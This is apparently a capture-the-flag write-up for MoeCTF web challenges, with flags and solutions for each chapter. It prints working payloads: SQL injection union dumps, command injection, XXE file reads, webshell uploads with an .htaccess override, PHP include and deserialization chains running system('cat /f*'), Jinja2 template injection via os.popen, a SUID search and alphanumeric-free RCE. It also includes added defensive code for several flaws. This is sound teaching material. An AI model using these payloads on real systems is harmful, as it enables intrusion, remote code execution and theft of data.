0 Web Beginner's Guide

Just paste it into the console and press Enter.

moectf{jv@vScr1p7_14_so0o0o0o_inT3r3&t!!!}

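01 Chapter 1: The Mysterious Bracelet

There is only front-end validation, so either reading the network response or typing directly into the console works.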

document.getElementById('passwordInput').value = "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";
validatePassword();

moectf{f_i2_1s_Your_g00d_fri3nd!!}

101 Chapter 1: The Mysterious Bracelet_revenge

02 Chapter 2: First Encounter with the Golden Dawn Mystic Trail

The page source contains the hint /golden_trail.

moectf{0bs3rv3_Th3_Gold3n_traiL}

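03 Chapter 3: The Sword-Testing Stone! Rewriting Fate!

Find the corresponding parameters in the page source and send them in a POST request.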

GET:test_talent?level=S
POST:{"manifestation":"flowing_azure_clouds"}

moectf{GeT-POST_tR4NsmlS5l0n-Is-a-GoOD_metH0D1ll4e}

04 Chapter 4: Golden Dawn Seal-Breaking and the Seven Puppets Array

Level 1: Rock Puppet

GET:key=xdsec

Level 2: Cloud-Weaving Puppet

POST:declaration=织云阁=第一

Level 3: Origin-Tracing Puppet

X-Forwarded-For:127.0.0.1

Level 4: Artifact-Spirit Puppet

User-Agent:moe browser

Level 5: Heart-Seal Puppet

Cookie:user=xt

Level 6: Past-Life Puppet

Referer:http://panshi/entry

Level 7: Reversal Puppet

PUT /void_rebirth HTTP/1.1
Host: 127.0.0.1:57488
Content-Type: text/plain
Content-Length: 11

新生!

curl works as well:

curl -X PUT 127.0.0.1:57488/void_rebirth -H "Content-Type: text/plain"  -d "新生!"

Putting the pieces together gives:

bW9lY3Rme0MwbjZyNDd1MTQ3MTBuNV95MHVyX2g3N1BfbDN2M2xfMTVfcjM0bGx5X2gxOWghfQ==

moectf{C0n6r47u14710n5_y0ur_h77P_l3v3l_15_r34lly_h19h!}
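Levels 3 to 6 pass because the server believes request headers that the client fully controls. The following is an added example, not code from the challenge: a server-side rule that honours X-Forwarded-For only when the TCP peer is a known reverse proxy. The proxy network 10.0.0.0/8 and the function names are assumptions.

```python
import ipaddress

# Assumption: the only reverse proxies in front of the app live in this network.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]


def _is_trusted_proxy(addr) -> bool:
    return any(addr in net for net in TRUSTED_PROXIES)


def client_ip(peer_addr: str, headers: dict) -> str:
    """Return the address to use for access decisions.

    peer_addr is the TCP peer of the connection. X-Forwarded-For is read only
    when that peer is a trusted proxy, and then the right-most entry that is
    not itself a trusted proxy is used (left-most entries are client-supplied).
    """
    peer = ipaddress.ip_address(peer_addr)
    if not _is_trusted_proxy(peer):
        return peer_addr  # direct connection: the header is untrusted input
    raw = headers.get("X-Forwarded-For", "")
    hops = [h.strip() for h in raw.split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            break  # malformed entry: stop trusting the chain
        if not _is_trusted_proxy(addr):
            return str(addr)
    return peer_addr


def is_local_request(peer_addr: str, headers: dict) -> bool:
    """The 'only localhost may enter' check, made on the derived address."""
    return ipaddress.ip_address(client_ip(peer_addr, headers)).is_loopback


if __name__ == "__main__":
    # Constructed request: a remote client sending the header from level 3.
    spoofed = {"X-Forwarded-For": "127.0.0.1"}
    print(is_local_request("203.0.113.7", spoofed))  # header ignored
```

User-Agent, Cookie and Referer are equally client-controlled, so none of them can serve as an access check on its own.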

05 Chapter 5: They've Come Knocking!

Plain directory traversal works.

../../../../../../flag

moectf{411-INpUT_I5-M@I1ciOU5801c66c}
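The traversal works because the requested name is joined onto a base directory without checking where the result lands. The following is an added example, not the challenge's code: a path check that resolves the final location first and rejects anything outside the base directory. The function names and the temporary directory in the demo are assumptions.

```python
import os
import tempfile


def resolve_inside(base_dir: str, user_path: str) -> str:
    """Resolve user_path under base_dir, or raise if it ends up outside."""
    base = os.path.realpath(base_dir)
    # realpath collapses ".." segments and follows symlinks, so the check
    # below is made on the path the OS would really open. An absolute
    # user_path replaces base in os.path.join and is caught the same way.
    candidate = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, candidate]) != base:
        raise PermissionError(f"path escapes {base!r}: {user_path!r}")
    return candidate


def is_rejected(base_dir: str, user_path: str) -> bool:
    """True when user_path must not be served from base_dir."""
    try:
        resolve_inside(base_dir, user_path)
    except (PermissionError, ValueError):  # ValueError: embedded NUL byte
        return True
    return False


if __name__ == "__main__":
    # Constructed directory standing in for the application's file root.
    root = tempfile.mkdtemp()
    open(os.path.join(root, "notes.txt"), "w").close()
    for name in ("notes.txt", "../../../../../../flag", "/flag"):
        print(name, "rejected" if is_rejected(root, name) else "allowed")
```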

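06 Chapter 6: The Scripture Vault Seal? A First Look at the Mystery!

The source has a hint, so I tried brute-forcing first.

That didn't work, so I then tried the "universal password" and logged in directly.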

GET:username=admin&password=1%27+or+1%3D1%23

moectf{W3LCOmE-TO-5QL-iNJecT1Onl110bc9682}

07 Chapter 7: The Spirit Spider Explores the Lair and the Yin-Yang Twin Talisman

robots.txt reveals flag.php; visiting it shows the source:

<?php
highlight_file(__FILE__);
$flag = getenv('FLAG');

$a = $_GET["a"] ?? "";
$b = $_GET["b"] ?? "";

if($a == $b){
    die("error 1");
}

if(md5($a) != md5($b)){
    die("error 2");
}

echo $flag;

A simple bypass: the 0e trick is enough.

GET:a=QNKCDZO&b=QLTHNDT

moectf{MD5-1S-N0t_sAf3l!213956cca2b}
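Why the two inputs above pass: PHP's `!=` treats two strings that both look like numbers as numbers, and both MD5 digests have the form 0e followed only by digits, so each evaluates to zero. The following is an added example, not part of the challenge: a small Python model of that comparison next to a strict one (what `===` or `hash_equals` does in PHP). The function names are assumptions, and the model covers only string-to-string comparison.

```python
import hashlib
import hmac
import re

# Shape of a PHP numeric string: optional sign, digits, optional exponent.
NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")


def php_loose_equal(x: str, y: str) -> bool:
    """Model of PHP `==` on two strings: numeric strings compare as numbers."""
    if NUMERIC.match(x) and NUMERIC.match(y):
        return float(x) == float(y)  # "0e83..." and "0e40..." are both 0.0
    return x == y


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def passes_loose(a: str, b: str) -> bool:
    """Same logic as flag.php: a != b, then md5(a) == md5(b), both loose."""
    return not php_loose_equal(a, b) and php_loose_equal(md5_hex(a), md5_hex(b))


def passes_strict(a: str, b: str) -> bool:
    """Hardened form: digests compared byte for byte, in constant time."""
    return a != b and hmac.compare_digest(md5_hex(a), md5_hex(b))


if __name__ == "__main__":
    a, b = "QNKCDZO", "QLTHNDT"  # the two values used in the request above
    print(md5_hex(a), md5_hex(b))
    print("loose:", passes_loose(a, b), "strict:", passes_strict(a, b))
```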

08 Chapter 8: Heavenly Mantra, the Star Chart Revealed

After some testing, the injection point turns out to be the password field again.

username=1&password=(the values tried for password are listed below)
1' or 1 order by 2# // normal
1' or 1 order by 3# // error
-1' union select 1,2# // 1 is echoed back
-1' union select (select group_concat(schema_name) from information_schema.schemata),2# // dump database names: information_schema,performance_schema,mysql,user
-1' union select (select group_concat(table_name) from information_schema.tables where table_schema=database()),2# // dump table names: flag,users
-1' union select (select group_concat(column_name) from information_schema.columns where table_name='flag'),2# // dump column names: value
-1' union select (select group_concat(value) from flag),2#

moectf{unION-b@53d_sQIl_FtW1l141d18e24}
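Both Chapter 6 and Chapter 8 work because the password value is pasted into the SQL text. The following is an added example, not the challenge's code: the same login query built by string concatenation and with bound parameters, run against an in-memory SQLite database. SQLite stands in for the challenge's MySQL, so the comment marker in the sample inputs is `--` instead of `#`; the table contents and function names are constructed.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed schema mirroring the table names found above."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'constructed-secret');
        CREATE TABLE flag(value TEXT);
        INSERT INTO flag VALUES ('constructed-flag');
    """)
    return db


def login_concat(db, username: str, password: str) -> list:
    """Vulnerable: user input becomes part of the SQL statement."""
    sql = ("SELECT username, password FROM users "
           f"WHERE username='{username}' AND password='{password}'")
    return db.execute(sql).fetchall()


def login_param(db, username: str, password: str) -> list:
    """Hardened: the statement is fixed; input is bound as data only."""
    sql = "SELECT username, password FROM users WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchall()


if __name__ == "__main__":
    db = make_db()
    tautology = "1' or 1=1-- "
    union = "-1' union select (select group_concat(value) from flag),2-- "
    for pw in (tautology, union):
        print("concat:", login_concat(db, "admin", pw))
        print("param: ", login_param(db, "admin", pw))
```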

Moe Comedy Chronicles: Guess-Guess-Boom

Reading the front-end logic shows that after a correct guess the page sends a POST request to /flag, with no other validation, so sending that request directly or from the console both work.

if(userGuess === randomNumber) {
    lastResult.textContent = '恭喜你!猜对了!';
    lastResult.style.backgroundColor = 'green';
    lowOrHi.textContent = '';
    guessField.disabled = true;
    guessBtn.disabled = true;
    // Request the flag after a correct guess
    fetch('/flag', {method: 'POST'})
        .then(res => res.json())
        .then(data => {
            document.querySelector('.flagResult').textContent = "FLAG: " + data.flag;
        });
    setGameOver();
}

fetch('/flag', {method: 'POST'})
.then(res => res.json())
.then(data => console.log(data));

Alternatively, print the number first and then simply enter it.

console.log(randomNumber);

moectf{425b9f24-2da4-e414-14c8-675634bb0462}

09 Chapter 9: Star Ruins Seal · Asking the Heavens for the Way

Separate with a semicolon to run a command.

GET:url=1;env

moectf{b9f31403-2d87-2d48-5204-f57921c3e8e1}

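10 Chapter 10: The Heavenly Secret Talisman Array

Since the input gets parsed, this is probably an XXE vulnerability, and the result includes the parsed section, so I tried referencing an entity directly to get the flag. Along the way I found that the file protocol cannot be used, so I used the filter protocol instead.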

<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/resource=flag.txt">
]>
<root>
<阵枢>引魂玉</阵枢>
<解析>&xxe;</解析>
<输出>已定义</输出>
</root>

moectf{G00d_7o6_4nD_XX3_Unl0ck_St4r_S34l}

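(PS: it actually seems that simply visiting flag.txt directly also gives the flag.)

10 Chapter 10: The Heavenly Secret Talisman Array_revenge

This is the revenge version of the previous challenge: the unintended solution of visiting flag.txt directly is banned, and the filter pseudo-protocol is disabled as well. Simply trying to read the file directly works.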

<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "/flag.txt">
]>
<root>
<阵枢>引魂玉</阵枢>
<解析>&xxe;</解析>
<输出>已定义</输出>
</root>

moectf{7bd76154-49af-4cf6-221b-36d817b3abeb}
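Both versions of Chapter 10 depend on the parser accepting a DOCTYPE and resolving the entity it declares; blocking individual protocols (file, then filter) leaves the mechanism in place. The following is an added example, not the challenge's code: a parser wrapper that refuses any document carrying a DOCTYPE before an entity can be declared. Python's expat stands in for the challenge's backend, which the page does not show; the function and class names are assumptions.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DTDForbidden(ValueError):
    """Raised when a document contains a DOCTYPE declaration."""


def parse_without_dtd(xml_text: str) -> ET.Element:
    """Parse xml_text into an element tree, refusing any DOCTYPE."""
    builder = ET.TreeBuilder()
    parser = expat.ParserCreate()

    def forbid_doctype(name, sysid, pubid, has_internal_subset):
        # Entities can only be declared inside a DTD, so stop right here.
        raise DTDForbidden(f"DOCTYPE {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = forbid_doctype
    parser.StartElementHandler = lambda tag, attrs: builder.start(tag, attrs)
    parser.EndElementHandler = lambda tag: builder.end(tag)
    parser.CharacterDataHandler = builder.data
    parser.Parse(xml_text, True)
    return builder.close()


def is_rejected(xml_text: str) -> bool:
    try:
        parse_without_dtd(xml_text)
    except DTDForbidden:
        return True
    return False


# The document submitted in the revenge challenge above.
XXE_DOC = """<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "/flag.txt">
]>
<root><阵枢>引魂玉</阵枢><解析>&xxe;</解析><输出>已定义</输出></root>"""

# Constructed benign document with the same element names.
PLAIN_DOC = "<root><阵枢>引魂玉</阵枢><解析>x</解析><输出>已定义</输出></root>"

if __name__ == "__main__":
    print(is_rejected(XXE_DOC), is_rejected(PLAIN_DOC))
```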

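111 Chapter 11: Thousand Mechanisms · The Illusion-Breaking Eye

HDdss saw that the GET parameter name is made up of the five letters m, n, o, p, q (each letter appears exactly once) and is exactly 5 characters long. He does not know the exact order of the letters, but he knows that entry is only granted when the parameter name equals the parameter value.

Write a script to generate the permutations; beyond that there is not much to say, it is pure brute force.

from itertools import permutations

# Define the list of letters
letters = ['m', 'n', 'o', 'p', 'q']

# Generate all permutations
all_permutations = permutations(letters)

# Convert the permutations into a list of strings
permutation_strings = [''.join(p) for p in all_permutations]

# Write the results to a file
with open('permutations.txt', 'w') as f:
    for perm in permutation_strings:
        f.write(perm + '\n')

print(f"共生成 {len(permutation_strings)} 种排列组合,已保存到 permutations.txt 文件中")

(PS: there are many attempts and the brute force is slow, so I suggest leaving it running in the background and doing something else.)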

12 Chapter 12: Jade Soul Mystic Gate · Breaking Illusion

RCE with nothing filtered.

POST:cmd=system("env");

moectf{86960176-47c0-ec40-470b-08bc12637f43}

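13 Chapter 13: Netherworld Pass · Eerie Shadows of the Spirit Runes

Upload a jpg, intercept the request and change the extension; the hex can also be edited in bp (Burp Suite).

Then just look at the environment variables to find the flag.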

moectf{b84b9f5f-278f-fad9-97cf-58f789f234fb}

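14 Chapter 14: Divine Guard Pass · The Sky-Mending Jade Stele

The challenge hint points to Apache's special file, .htaccess.

<FilesMatch "1.jpg">
    SetHandler application/x-httpd-php
</FilesMatch>

Upload the image webshell and the config file separately, then connect to the shell.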

moectf{2335551f-5971-b892-cc13-cf80594fa9f4}

Stumbled on a FLAG While Treasure Hunting, Couldn't Win Even Giving It My All

The source contains the following code, which shows that realCode and myToken must be sent to the /verify route as JSON.

function generateRandomDigitArray(length) {
    return new Promise((resolve, reject) => {
        fetch(`/get_challenge?count=${length}`)
            .then((response) => {
                if (!response.ok) {
                    throw new Error(`HTTP error! status: ${response.status}`);
                }
                return response.json();
            })
            .then((data) => {
                if (data.error) {
                    reject(data.error);
                } else {
                    const real = data.numbers;
                    const guess = Array.from({ length }, () => null);
                    myToken = data.token; // save the token into myToken
                    resolve({ real, guess });
                }
            })
            .catch((error) => {
                console.error("Error fetching challenge data:", error);
                reject("Failed to fetch challenge data.");
            });
    });
}

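fetch("/verify", {
    method: "POST",
    headers: {
        "Content-Type": "application/json"
    },
    body: JSON.stringify({
        answers: realCode,
        token: myToken
    })
})

A closer look shows that the /get_challenge route returns both of these values, and note that clearing the level uses realCode rather than guessCode, so once again sending the request straight from the console works.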

(async () => {
    const { numbers, token } = await (await fetch('/get_challenge?count=9')).json();
    const data = await (await fetch('/verify', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ answers: numbers, token })
    })).json();
    console.log('flag =', data.flag);
})();

moectf{9399d1ed-df95-9a1d-b3c5-8d200f8dd423}

115 Chapter 15: Return-to-Truth Pass · Racing Time to Purge the Demon

My guess: file upload + race condition.

16 Chapter 16: Kunlun Star Path

<?php
error_reporting(0);
highlight_file(__FILE__);

include($_GET['file'] . ".php");

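Just include the file through a pseudo-protocol. With the data pseudo-protocol, once the PHP statement is complete, whatever comes after it no longer matters.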

GET:file=data://text/plain,<?php eval($_POST[123]);?>
POST:123=system("tac /f*");

moectf{d4d81b94-86b6-55df-923b-0c874f251b6c}

17 Chapter 17: Star Remains Maze · Reconstructing the Divine Mind

<?php
highlight_file(__FILE__);

class A {
    public $a;
    function __destruct() {
        eval($this->a);
    }
}

if(isset($_GET['a'])) {
    unserialize($_GET['a']);
}

A simple deserialization; just build the payload in a.

<?php

class A {
    public $a;
}

$a=new A();
$a->a='system("cat /f*");';
echo serialize($a);

GET:a=O:1:"A":1:{s:1:"a";s:18:"system("cat /f*");";}

moectf{b95a2fcb-1e33-ed47-1d79-e866d0df7ba2}

18 Chapter 18: The Eerie Pavilion of Ten Thousand Scrolls · Chained Techniques

<?php
highlight_file(__FILE__);

class PersonA {
    private $name;
    function __wakeup() {
        $name=$this->name;
        $name->work();
    }
}

class PersonB {
    public $name;
    function work(){
        $name=$this->name;
        eval($name);
    }

}

if(isset($_GET['person'])) {
    unserialize($_GET['person']);
}

This one can also be hit directly; the exp is below. There is a private property here, which I simply changed.

<?php

class PersonA {
    public $name;
}

class PersonB {
    public $name;
}

$a=new PersonA();
$a->name=new PersonB();
$a->name->name='system("cat /f*");';
echo serialize($a);
#PersonA::__wakeup()->PersonB::work()

GET:person=O:7:"PersonA":1:{s:4:"name";O:7:"PersonB":1:{s:4:"name";s:18:"system("cat /f*");";}}

moectf{8b754005-c94e-8124-e69e-7815e30e7b34}

19 Chapter 19: Truth of the Star Dome · Mending the Sky, Returning to the Source

<?php
highlight_file(__FILE__);

class Person
{
    public $name;
    public $id;
    public $age;

    public function __invoke($id)
    {
        $name = $this->id;
        $name->name = $id;
        $name->age = $this->name;
    }
}

class PersonA extends Person
{
    public function __destruct()
    {
        $name = $this->name;
        $id = $this->id;
        $age = $this->age;
        $name->$id($age);
    }
}

class PersonB extends Person
{
    public function __set($key, $value)
    {
        $this->name = $value;
    }
}

class PersonC extends Person
{
    public function __Check($age)
    {
        if(str_contains($this->age . $this->name,"flag"))
        {
            die("Hacker!");
        }
        $name = $this->name;
        $name($age);
    }

    public function __wakeup()
    {
        $age = $this->age;
        $name = $this->id;
        $name->age = $age;
        $name($this);
    }
}

if(isset($_GET['person']))
{
    $person = unserialize($_GET['person']);
}

Command execution by triggering __Check directly, though I don't know what PersonB is for here.

<?php

class Person
{
    public $name;
    public $id;
    public $age;
}

class PersonA extends Person
{
}

class PersonB extends Person
{
}

class PersonC extends Person
{
}

$a=new PersonA();
$a->name=new PersonC();
$a->id="__Check";
$a->age="cat /f*";
$a->name->name="system";
echo serialize($a);
#PersonA::__destruct()->PersonC::__Check()

GET:person=O:7:"PersonA":3:{s:4:"name";O:7:"PersonC":3:{s:4:"name";s:6:"system";s:2:"id";N;s:3:"age";N;}s:2:"id";s:7:"__Check";s:3:"age";s:7:"cat /f*";}

moectf{e5fedb70-f3f9-52cf-4b3d-ff90b860a13a}

19 Chapter 19_revenge

<?php
highlight_file(__FILE__);

class Person
{
    public $name;
    public $id;
    public $age;
}

class PersonA extends Person
{
    public function __destruct()
    {
        $name = $this->name;
        $id = $this->id;
        $name->$id($this->age);
    }
}

class PersonB extends Person
{
    public function __set($key, $value)
    {
        $this->name = $value;
    }

    public function __invoke($id)
    {
        $name = $this->id;
        $name->name = $id;
        $name->age = $this->name;
    }
}

class PersonC extends Person
{
    public function check($age)
    {
        $name=$this->name;
        if($age == null)
        {
            die("Age can't be empty.");
        }
        else if($name === "system")
        {
            die("Hacker!");
        }
        else
        {
            var_dump($name($age));
        }
    }

    public function __wakeup()
    {
        $name = $this->id;
        $name->age = $this->age;
        $name($this);
    }
}

if(isset($_GET['person']))
{
    $person = unserialize($_GET['person']);
}

<?php

class Person
{
    public $name;
    public $id;
    public $age;
}

class PersonA extends Person
{
}

class PersonB extends Person
{
}

class PersonC extends Person
{
}

$a=new PersonA();
$a->name=new PersonC();
$a->id="check";
$a->age='env';
$a->name->name="passthru";
echo serialize($a);
#PersonA::__destruct()->PersonC::check()

GET:person=O:7:"PersonA":3:{s:4:"name";O:7:"PersonC":3:{s:4:"name";s:8:"passthru";s:2:"id";N;s:3:"age";N;}s:2:"id";s:5:"check";s:3:"age";s:3:"env";}

moectf{884d956e-2a19-6445-8e49-a77dba1e043a}

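20 Chapter 20: Netherworld Blood Sea · Phantom Words of the Inner Demon

A quick test first: logging in with admin and the universal password echoed back admin, which made me suspect SSTI; trying {{7*7}} confirmed it.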

GET:username={{lipsum.__globals__['os'].popen('cat /flag').read()}}&password=1'+or+1=1#

moectf{a8271eb6-ff04-d97c-93c7-4a1865d66bd6}

21 Chapter 21: Vortex of Rebirth · The Word-Spirit Deadlock

__, global, {{ and }} are filtered; bypass each of them separately.

GET:username={%print lipsum["\x5f\x5fglo""bals\x5f\x5f"]['os'].popen('cat /flag').read()%}&password=1'+or+1=1#

moectf{6974bf4f-e2af-97b4-7055-642d621dea0d}

122 Chapter 22: Core of the Blood Sea · A Thousand-Year Scheme

This one requires reading the source code, shown below:

from flask import Flask, request, render_template, render_template_string

app = Flask(__name__)

@app.route('/')
def index():
    if 'username' in request.args or 'password' in request.args:
        username = request.args.get('username', '')
        password = request.args.get('password', '')

        if not username or not password:
            login_msg = """
            <div class="login-result" id="result">
                <div class="result-title">阵法反馈</div>
                <div id="result-content"><div class='login-fail'>用户名或密码不能为空</div></div>
            </div>
            """
        else:
            login_msg = f"""
            <div class="login-result" id="result">
                <div class="result-title">阵法反馈</div>
                <div id="result-content"><div class='login-success'>Welcome: {username}</div></div>
            </div>
            """
            render_template_string(login_msg)
    else:
        login_msg = ""

    return render_template("index.html", login_msg=login_msg)

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)

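Note that although the template is rendered here, the rendered result is never displayed; the directly concatenated string is shown instead, which gives the illusion that nothing was rendered. Blind (no-echo) SSTI can be used here; see "SSTI无回显处理(新回显方式) - tammy66 - 博客园".

However, trying to read the flag directly did not succeed here; is privilege escalation needed as well?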

GET:username={{lipsum.__globals__.__builtins__.setattr(lipsum.__spec__.__init__.__globals__.sys.modules.werkzeug.serving.WSGIRequestHandler,"protocol_version",lipsum.__globals__.__builtins__.__import__('os').popen('ls+-la+/flag').read())}}&password=1

First, look for a way to escalate privileges.

GET:username={{lipsum.__globals__.__builtins__.setattr(lipsum.__spec__.__init__.__globals__.sys.modules.werkzeug.serving.WSGIRequestHandler,"protocol_version",lipsum.__globals__.__builtins__.__import__('os').popen('find+/+-user+root+-perm+-4000+-print+2>/dev/null').read())}}&password=1

See "rev | GTFOBins"; the read still does not succeed, though.

GET:username={{lipsum.__globals__.__builtins__.setattr(lipsum.__spec__.__init__.__globals__.sys.modules.werkzeug.serving.WSGIRequestHandler,"protocol_version",lipsum.__globals__.__builtins__.__import__('os').popen('/usr/bin/rev+/flag+|+/usr/bin/rev').read())}}&password=1
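Chapters 20 to 22 share one flaw: the username is placed into the template source before rendering, and in Chapter 22 the template is still evaluated even though its output is thrown away. The following is an added example, not the challenge's code: it uses Jinja2 directly (the engine behind Flask's render_template_string) to show the flaw, the discarded-output case with a harmless probe, and the fix of passing the username as data. The function names and the audit_probe helper are assumptions.

```python
from jinja2 import Environment

env = Environment(autoescape=True)

# Harmless stand-in for "something happened during rendering".
calls = []
env.globals["audit_probe"] = lambda: calls.append("evaluated") or ""


def render_vulnerable(username: str) -> str:
    """Same flaw as the f-string above: input becomes template source."""
    return env.from_string(f"<div>Welcome: {username}</div>").render()


def login_msg_discarded(username: str) -> str:
    """Chapter 22 pattern: render, drop the result, return the raw string."""
    msg = f"<div>Welcome: {username}</div>"
    env.from_string(msg).render()  # output unused, but expressions still run
    return msg


# Hardened: the template text is a constant; the username is only a value.
WELCOME = env.from_string("<div>Welcome: {{ username }}</div>")


def render_safe(username: str) -> str:
    return WELCOME.render(username=username)


if __name__ == "__main__":
    print(render_vulnerable("{{7*7}}"))   # expression is evaluated
    print(render_safe("{{7*7}}"))         # expression stays literal text
    login_msg_discarded("{{ audit_probe() }}")
    print(calls)                          # the probe ran despite no output
```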

1 Is This… a Webshell?

<?php
highlight_file(__FILE__);
if(isset($_GET['shell'])) {
    $shell = $_GET['shell'];
    if(!preg_match('/[A-Za-z0-9]/is', $_GET['shell'])) {
        eval($shell);
    } else {
        echo "Hacker!";
    }
}
?>

RCE without alphanumeric characters; XOR does the job. See "无字母数字 RCE 的总结 | X1ongSec".

GET:shell=$_=(">">"<");$__=(">">"<")%2b(">">"<");$___=(~'澞'[$__]).(~'猬'[$_]).(~'猬'[$_]).(~'湚'[$__]).(~'獬'[$_]).~('狴'[$_]);$____='_'.(~'溯'[$__]).(~'淰'[$__]).(~'沬'[$__]).(~'湫'[$__]);$_____=$$____;$___($_____[_]);
POST:_=system("cat /f*");

moectf{0c48c840-be3f-9473-d68c-06aeb3539bff}

1 Is This… a Webshell?_revenge